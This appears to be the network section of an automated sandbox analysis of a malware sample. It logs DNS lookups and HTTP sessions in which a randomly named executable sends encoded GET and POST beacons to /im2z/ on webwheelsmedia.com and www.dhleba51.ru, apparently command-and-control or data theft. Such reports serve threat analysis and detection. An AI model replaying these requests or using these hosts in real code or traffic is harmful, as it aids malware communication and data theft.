                                        Apr 24, 2024 07:05:07.893367052 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.893419981 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.910392046 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.910434008 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.910574913 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.927692890 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.927736044 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.927803993 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:07.944885015 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.945022106 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:07.945075035 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:08.119462967 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.119479895 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.119544029 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:08.127286911 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.127305031 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.127365112 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:08.143462896 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.143477917 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.143543959 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:08.157310963 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.157332897 CEST8049717195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:08.157409906 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:08.594146967 CEST4971780192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.047904015 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.393101931 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.397000074 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.397248030 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.742189884 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.742221117 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.746354103 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.746409893 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.746483088 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.746908903 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747092009 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747138023 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747138023 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.747189999 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747216940 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747234106 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.747277021 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747318983 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:10.747963905 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.747980118 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:10.748029947 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:11.091476917 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.091497898 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.091542959 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.091557026 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092031956 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092093945 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092181921 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092276096 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092344046 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092426062 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092472076 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092554092 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092575073 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092631102 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092644930 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092745066 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092940092 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.092993021 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.093038082 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.093096018 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.094489098 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:11.439747095 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439862013 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439877987 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439892054 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439909935 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439932108 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:11.439958096 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.439975023 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:11.440017939 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.440116882 CEST4971880192.168.2.9195.24.68.5
                                        Apr 24, 2024 07:05:11.440234900 CEST8049718195.24.68.5192.168.2.9
                                        Apr 24, 2024 07:05:11.440315008 CEST4971880192.168.2.9195.24.68.5

                                        UDP Packets

                                        TimestampSource PortDest PortSource IPDest IP
                                        Apr 24, 2024 07:03:03.118156910 CEST6378453192.168.2.91.1.1.1
                                        Apr 24, 2024 07:03:03.271579027 CEST53637841.1.1.1192.168.2.9
                                        Apr 24, 2024 07:03:04.226878881 CEST5058953192.168.2.91.1.1.1
                                        Apr 24, 2024 07:03:04.381294012 CEST53505891.1.1.1192.168.2.9
                                        Apr 24, 2024 07:04:46.486382008 CEST6475653192.168.2.91.1.1.1
                                        Apr 24, 2024 07:04:46.713354111 CEST53647561.1.1.1192.168.2.9
                                        Apr 24, 2024 07:05:02.944358110 CEST6133053192.168.2.91.1.1.1
                                        Apr 24, 2024 07:05:03.876254082 CEST53613301.1.1.1192.168.2.9

                                        DNS Queries

                                        TimestampSource IPDest IPTrans IDOP CodeNameTypeClassDNS over HTTPS
                                        Apr 24, 2024 07:03:03.118156910 CEST192.168.2.91.1.1.10x8cbStandard query (0)drive.google.comA (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:04.226878881 CEST192.168.2.91.1.1.10x9ab2Standard query (0)drive.usercontent.google.comA (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:04:46.486382008 CEST192.168.2.91.1.1.10x8ac5Standard query (0)www.webwheelsmedia.comA (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:05:02.944358110 CEST192.168.2.91.1.1.10x24a6Standard query (0)www.dhleba51.ruA (IP address)IN (0x0001)false

                                        DNS Answers

                                        TimestampSource IPDest IPTrans IDReply CodeNameCNameAddressTypeClassDNS over HTTPS
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.100A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.102A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.113A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.101A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.139A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:03.271579027 CEST1.1.1.1192.168.2.90x8cbNo error (0)drive.google.com142.250.101.138A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:03:04.381294012 CEST1.1.1.1192.168.2.90x9ab2No error (0)drive.usercontent.google.com142.251.2.132A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:04:46.713354111 CEST1.1.1.1192.168.2.90x8ac5No error (0)www.webwheelsmedia.comwebwheelsmedia.comCNAME (Canonical name)IN (0x0001)false
                                        Apr 24, 2024 07:04:46.713354111 CEST1.1.1.1192.168.2.90x8ac5No error (0)webwheelsmedia.com162.241.253.78A (IP address)IN (0x0001)false
                                        Apr 24, 2024 07:05:03.876254082 CEST1.1.1.1192.168.2.90x24a6No error (0)www.dhleba51.ru195.24.68.5A (IP address)IN (0x0001)false

                                        HTTP Request Dependency Graph

                                        • drive.google.com
                                        • drive.usercontent.google.com
                                        • www.webwheelsmedia.com
                                        • www.dhleba51.ru

                                        HTTP Packets

                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        0192.168.2.949715162.241.253.78805248C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        TimestampBytes transferredDirectionData
                                        Apr 24, 2024 07:04:46.900902033 CEST390OUTGET /im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY HTTP/1.1
                                        Host: www.webwheelsmedia.com
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Language: en-US,en
                                        Connection: close
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Apr 24, 2024 07:04:47.247191906 CEST713INHTTP/1.1 301 Moved Permanently
                                        Date: Wed, 24 Apr 2024 05:04:47 GMT
                                        Server: nginx/1.21.6
                                        Content-Type: text/html; charset=UTF-8
                                        Content-Length: 0
                                        Expires: Wed, 11 Jan 1984 05:00:00 GMT
                                        Cache-Control: no-cache, must-revalidate, max-age=0
                                        X-Redirect-By: WordPress
                                        Location: http://webwheelsmedia.com/im2z/?_Ny4=z4HNqRUNVhKU+Qtv1eU7JRxQK/gynbhJk0uSl0XlGEkve/f45BAiGTLGfSdewEtjJuikjLVXYXf/hVlacLZbmvfCaC2wD3OuQ9Qp/Q6XbR8wDKz6gQ==&B6H=rZ8dY
                                        host-header: c2hhcmVkLmJsdWVob3N0LmNvbQ==
                                        X-Newfold-Cache-Level: 2
                                        X-Endurance-Cache-Level: 2
                                        X-nginx-cache: WordPress
                                        X-Server-Cache: true
                                        X-Proxy-Cache: MISS
                                        Set-Cookie: nfdbrandname=bluehost; expires=Sat, 22 Apr 2034 05:04:47 GMT; Max-Age=315360000; path=/


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        1192.168.2.949716195.24.68.5805248C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        TimestampBytes transferredDirectionData
                                        Apr 24, 2024 07:05:04.214073896 CEST643OUTPOST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 193
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 36 59 46 47 70 41 66 38 63 70 32 37 57 75 57 78 4f 4d 74 54 4b 38 76 2b 6d 6a 6c 33 64 79 36 63 6c 38 69 67 68 48 77 38 45 2b 48 2b 4e 64 4f 34 69 45 6c 57 42 77 6f 76 69 72 74 58 4c 49 47 61 56 70 4e 59 53 4d 78 65 67 6e 53 72 4b 69 5a 59 55 75 54 58 72 6e 62 46 36 67 70 76 4a 47 4c 51 43 2f 32 65 7a 59 42 44 64 66 4c 64 2f 4a 58 34 38 6d 63 63 75 41 31 6b 66 65 4a 42 59 4b 79 54 6f 6e 4d 6c 43 41 6c 77 4c 58 48 77 4a 50 4f 4d 71 33 6c 79 52 75 2b 50 46 33 67 70 42 39 52 5a 54 38 52 74 4a 6f 77 4b 64 4b 6c 78 65 56 4f 65
                                        Data Ascii: _Ny4=zxv1usXggHyH6YFGpAf8cp27WuWxOMtTK8v+mjl3dy6cl8ighHw8E+H+NdO4iElWBwovirtXLIGaVpNYSMxegnSrKiZYUuTXrnbF6gpvJGLQC/2ezYBDdfLd/JX48mccuA1kfeJBYKyTonMlCAlwLXHwJPOMq3lyRu+PF3gpB9RZT8RtJowKdKlxeVOe
                                        Apr 24, 2024 07:05:04.554496050 CEST1289INHTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:04 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes
                                        Data Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0a 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 22 3e 3c 68 65 61 64 3e 0a 20 20 20 20 3c 6d 65 74 61 20 63 68 61 72 73 65 74 3d 22 55 54 46 2d 38 22 3e 0a 20 20 20 20 3c 6d 65 74 61 20 6e 61 6d 65 3d 22 76 69 65 77 70 6f 72 74 22 20 63 6f 6e 74 65 6e 74 3d 22 77 69 64 74 68 3d 64 65 76 69 63 65 2d 77 69 64 74 68 2c 20 69 6e 69 74 69 61 6c 2d 73 63 61 6c 65 3d 31 2e 30 22 3e 0a 20 20 20 20 3c 74 69 74 6c 65 3e d0 9e d1 88 d0 b8 d0 b1 d0 ba d0 b0 20 34 30 34 3c 2f 74 69 74 6c 65 3e 0a 20 20 20 20 3c 6c 69 6e 6b 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 66 6f 6e 74 73 2e 67 6f 6f 67 6c 65 61 70 69 73 2e 63 6f 6d 2f 63 73 73 32 3f 66 61 6d 69 6c 79 3d 4e 6f 74 6f 2b 53 61 6e 73 3a 77 67 68 74 40 34 30 30 3b 37 30 30 26 61 6d 70 3b 64 69 73 70 6c 61 79 3d 73 77 61 70 22 20 72 65 6c 3d 22 73 74 79 6c 65 73 68 65 65 74 22 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 79 61 73 74 61 74 69 63 2e 6e 65 74 2f 70 63 6f 64 65 2f 61 64 66 6f 78 2f 6c 6f 61 64 65 72 2e 6a 73 22 20 63 72 6f 73 73 6f 72 69 67 69 6e 3d 22 61 6e 6f 6e 79 6d 6f 75 73 22 3e 3c 2f 73 63 72 69 70 74 3e 0a 20 20 20 20 3c 73 63 72 69 70 74 20 74 79 70 65 3d 22 74 65 78 74 2f 6a 61 76 61 73 63 72 69 70 74 22 20 6c 61 6e 67 75 61 67 65 3d 22 6a 61 76 61 73 63 72 69 70 74 22 20 3e 0a 76 61 72 20 70 75 6e 79 63 6f 64 65 20 3d 20 6e 65 77 20 66 75 6e 63 74 69 6f 6e 20 50 75 6e 79 63 6f 64 65 28 29 20 7b 0a 20 20 20 20 74 68 69 73 2e 75 74 66 31 36 20 3d 20 7b 0a 20 20 20 20 20 20 20 20 64 65 63 6f 64 65 3a 66 75 6e 63 74 69 6f 6e 28 69 6e 70 75 74 29 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 70 75 74 20 3d 20 5b 5d 2c 20 69 3d 30 2c 20 6c 65 6e 3d 69 6e 70 75 74 2e 6c 65 6e 67 74 68 2c 76 61 6c 75 65 2c 65 78 74 72 61 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 77 68 69 6c 65 20 28 69 20 3c 20 6c 65 6e 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 38 30 30 29 20 3d 3d 3d 20 30 78 44 38 30 30 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 65 78 74 72 61 20 3d 20 69 6e 70 75 74 2e 63 68 61 72 43 6f 64 65 41 74 28 69 2b 2b 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 20 28 28 76 61 6c 75 65 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 38 30 30 29 20 7c 7c 20 28 28 65 78 74 72 61 20 26 20 30 78 46 43 30 30 29 20 21 3d 3d 20 30 78 44 43 30 30 29 20 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 6e 65 77 20 52 61 6e 67 65 45 72 72 6f 72 28 22 55 54 46 2d 31 36 28 64 65 63 6f 64 65 29 3a 20 49 6c 6c 65 67 61 6c 20 55 54 46 2d 31 36 20 73 65 71 75 65 6e 63 65 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 76 61 6c 75 65 20 3d 20 28 28 76 61 6c 75 65 20 26 20 30 78 33 46 46 29 20 3c 3c 20 31 30 29 20 2b 20 28 65 78 74 72 61 20 26 20 30 78 33 46 46 29 20 2b 20 30 78 31 30 30 30 30 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 6f 75 74
                                        Data Ascii: <!DOCTYPE html><html lang="en"><head> <meta charset="UTF-8"> <meta name="viewport" content="width=device-width, initial-scale=1.0"> <title> 404</title> <link href="https://fonts.googleapis.com/css2?family=Noto+Sans:wght@400;700&amp;display=swap" rel="stylesheet"> <script src="https://yastatic.net/pcode/adfox/loader.js" crossorigin="anonymous"></script> <script type="text/javascript" language="javascript" >var punycode = new function Punycode() { this.utf16 = { decode:function(input){ var output = [], i=0, len=input.length,value,extra; while (i < len) { value = input.charCodeAt(i++); if ((value & 0xF800) === 0xD800) { extra = input.charCodeAt(i++); if ( ((value & 0xFC00) !== 0xD800) || ((extra & 0xFC00) !== 0xDC00) ) { throw new RangeError("UTF-16(decode): Illegal UTF-16 sequence"); } value = ((value & 0x3FF) << 10) + (extra & 0x3FF) + 0x10000; } out
                                        Apr 24, 2024 07:05:04.554573059 CEST1289INData Raw: 70 75 74 2e 70 75 73 68 28 76 61 6c 75 65 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 20 20 20 20 72 65 74 75 72 6e 20 6f 75 74 70 75 74 3b 0a 20 20 20 20 20 20 20 20 7d 2c 0a 20 20 20 20 20 20 20 20 65 6e 63 6f 64
                                        Data Ascii: put.push(value); } return output; }, encode:function(input){ var output = [], i=0, len=input.length,value; while (i < len) { value = input[i++]; if
                                        Apr 24, 2024 07:05:04.554647923 CEST1289INData Raw: 61 6d 70 29 20 3a 20 28 64 65 6c 74 61 20 3e 3e 20 31 29 3b 0a 20 20 20 20 20 20 20 20 64 65 6c 74 61 20 2b 3d 20 4d 61 74 68 2e 66 6c 6f 6f 72 28 64 65 6c 74 61 20 2f 20 6e 75 6d 70 6f 69 6e 74 73 29 3b 0a 0a 20 20 20 20 20 20 20 20 66 6f 72 20
                                        Data Ascii: amp) : (delta >> 1); delta += Math.floor(delta / numpoints); for (k = 0; delta > (((base - tmin) * tmax) >> 1); k += base) { delta = Math.floor(delta / ( base - tmin )); } return Math.floor(k +
                                        Apr 24, 2024 07:05:04.554704905 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 74 68 72 6f 77 20 52 61 6e 67 65 45 72 72 6f 72 20 28 22 70 75 6e 79 63 6f 64 65 5f 62 61 64 5f 69 6e 70 75 74 28 31 29 22 29 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20
                                        Data Ascii: throw RangeError ("punycode_bad_input(1)"); } digit = decode_digit(input.charCodeAt(ic++)); if (digit >= base) { throw RangeError("punycode_bad_
                                        Apr 24, 2024 07:05:04.554924011 CEST1289INData Raw: 70 75 74 2e 6c 65 6e 67 74 68 3b 20 69 20 3c 20 6c 65 6e 3b 20 69 2b 2b 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 63 61 73 65 5f 66 6c 61 67 73 5b 69 5d 29 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20
                                        Data Ascii: put.length; i < len; i++) { if (case_flags[i]) { output[i] = (String.fromCharCode(output[i]).toUpperCase()).charCodeAt(0); } } } return this.utf16.encode(output);
                                        Apr 24, 2024 07:05:04.555080891 CEST1289INData Raw: 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 6a 76 20 3d 20 69 6e 70 75 74 5b 6a 5d 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 69 66 20 28 69 6a 76 20 3e 3d 20 6e 20 26 26 20 69 6a 76 20 3c 20 6d 29 20 6d 20 3d 20 69 6a 76 3b 0a
                                        Data Ascii: ijv = input[j]; if (ijv >= n && ijv < m) m = ijv; } if (m - n > Math.floor((maxint - delta) / (h + 1))) { throw RangeError("punycode_overflow (1)"); }
                                        Apr 24, 2024 07:05:04.555094004 CEST1289INData Raw: 20 20 20 20 20 20 20 76 61 72 20 64 6f 6d 61 69 6e 5f 61 72 72 61 79 20 3d 20 64 6f 6d 61 69 6e 2e 73 70 6c 69 74 28 22 2e 22 29 3b 0a 20 20 20 20 20 20 20 20 76 61 72 20 6f 75 74 20 3d 20 5b 5d 3b 0a 20 20 20 20 20 20 20 20 66 6f 72 20 28 76 61
                                        Data Ascii: var domain_array = domain.split("."); var out = []; for (var i=0; i < domain_array.length; ++i) { var s = domain_array[i]; out.push( s.match(/[^A-Za-z0-9-]/) ? "xn-
                                        Apr 24, 2024 07:05:04.555108070 CEST1289INData Raw: 61 70 70 65 72 20 7b 0a 09 09 09 70 61 64 64 69 6e 67 3a 20 30 70 78 3b 0a 09 09 09 6d 61 72 67 69 6e 3a 20 30 20 61 75 74 6f 3b 0a 09 09 09 6d 61 78 2d 77 69 64 74 68 3a 20 31 30 32 34 70 78 3b 0a 09 09 09 64 69 73 70 6c 61 79 3a 20 66 6c 65 78
                                        Data Ascii: apper {padding: 0px;margin: 0 auto;max-width: 1024px;display: flex;flex-direction: column;justify-content: space-between; flex: 1 0 auto; } .logo { padding: 30px 40px; }
                                        Apr 24, 2024 07:05:04.555155993 CEST1289INData Raw: 20 2e 66 6f 6f 74 65 72 2d 6c 69 6e 6b 73 20 7b 0a 20 20 20 20 20 20 20 20 20 20 20 20 64 69 73 70 6c 61 79 3a 20 67 72 69 64 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 67 72 69 64 2d 61 72 65 61 3a 20 6c 69 6e 6b 73 3b 0a 20 20 20 20 20 20 20 20
                                        Data Ascii: .footer-links { display: grid; grid-area: links; grid-template-columns: repeat(2, 1fr); grid-column-gap: 80px; grid-row-gap: 10px; font-size: 13px; } .fo
                                        Apr 24, 2024 07:05:04.555196047 CEST1289INData Raw: 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 20 62 6f 72 64 65 72 2d 62 6f 74 74 6f 6d 3a 20 31 70 78 20 73 6f 6c 69 64 20 23 46 33 46 34 46 37 3b 0a 20 20 20 20 20 20 20 20 20 20 20 20 7d 0a 20 20 20 20 20 20 20 20 7d 0a 20 20 20
                                        Data Ascii: 4F7; border-bottom: 1px solid #F3F4F7; } } </style></head><body><header> <div class="logo"> <a href="https://www.nic.ru/"> <svg width="100" height="42" viewBox="0 0
                                        Apr 24, 2024 07:05:04.891639948 CEST1289INData Raw: 36 33 34 43 34 30 2e 36 37 31 34 20 32 30 2e 38 38 35 37 20 34 30 2e 30 32 34 37 20 32 30 2e 39 34 37 35 20 33 39 2e 32 33 31 32 20 32 30 2e 39 34 37 35 5a 22 20 66 69 6c 6c 3d 22 23 31 34 32 39 35 45 22 3e 3c 2f 70 61 74 68 3e 0a 20 20 20 20 20
                                        Data Ascii: 634C40.6714 20.8857 40.0247 20.9475 39.2312 20.9475Z" fill="#14295E"></path> <path d="M53.1509 14.1788C53.1695 14.0678 53.1828 13.9659 53.1923 13.8744C53.2017 13.7815 53.2065 13.6867 53.2065 13.5876C53.2065 13.1011 53.0556


                                        Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                        2192.168.2.949717195.24.68.5805248C:\Program Files (x86)\WlTfjZxwOvgTwrNlfiOwVtiYnOHnAouFcPIfYbgHxiC\MSHXUddoGk.exe
                                        TimestampBytes transferredDirectionData
                                        Apr 24, 2024 07:05:07.080873013 CEST667OUTPOST /im2z/ HTTP/1.1
                                        Host: www.dhleba51.ru
                                        Accept: text/html,application/xhtml+xml,application/xml;q=0.9,*/*;q=0.8
                                        Accept-Encoding: gzip, deflate
                                        Accept-Language: en-US,en
                                        Origin: http://www.dhleba51.ru
                                        Connection: close
                                        Content-Length: 217
                                        Content-Type: application/x-www-form-urlencoded
                                        Cache-Control: no-cache
                                        Referer: http://www.dhleba51.ru/im2z/
                                        User-Agent: Mozilla/5.0 (Windows NT 5.1; WOW64; rv:39.0) Gecko/20100101 Firefox/39.0
                                        Data Raw: 5f 4e 79 34 3d 7a 78 76 31 75 73 58 67 67 48 79 48 67 37 64 47 75 6a 6e 38 58 70 32 6b 4b 2b 57 78 45 73 74 58 4b 39 54 2b 6d 69 77 77 49 51 65 63 6b 5a 65 67 67 46 49 38 44 2b 48 2b 43 39 4f 39 74 6b 6c 6e 42 77 6c 50 69 72 52 58 4c 49 69 61 56 72 56 59 54 2b 5a 52 6d 6e 53 70 48 43 5a 61 62 4f 54 58 72 6e 62 46 36 67 4d 30 4a 47 44 51 44 50 47 65 78 38 56 4d 44 50 4c 53 36 4a 58 34 34 6d 63 41 75 41 31 57 66 61 42 6e 59 4a 4b 54 6f 69 6f 6c 46 52 6c 33 51 48 48 79 58 2f 4f 54 71 46 30 57 51 6f 65 53 4e 46 67 62 42 4f 78 38 64 39 78 7a 59 61 35 52 49 64 6c 57 5a 79 48 32 70 4f 56 6b 69 53 6f 73 46 70 2b 35 55 77 32 61 75 61 6f 67 6f 77 3d 3d
                                        Data Ascii: _Ny4=zxv1usXggHyHg7dGujn8Xp2kK+WxEstXK9T+miwwIQeckZeggFI8D+H+C9O9tklnBwlPirRXLIiaVrVYT+ZRmnSpHCZabOTXrnbF6gM0JGDQDPGex8VMDPLS6JX44mcAuA1WfaBnYJKToiolFRl3QHHyX/OTqF0WQoeSNFgbBOx8d9xzYa5RIdlWZyH2pOVkiSosFp+5Uw2auaogow==
                                        Apr 24, 2024 07:05:07.428824902 CEST1289INHTTP/1.1 404 Not Found
                                        Server: openresty
                                        Date: Wed, 24 Apr 2024 05:05:07 GMT
                                        Content-Type: text/html; charset=utf-8
                                        Content-Length: 48773
                                        Connection: close
                                        Accept-Ranges: bytes
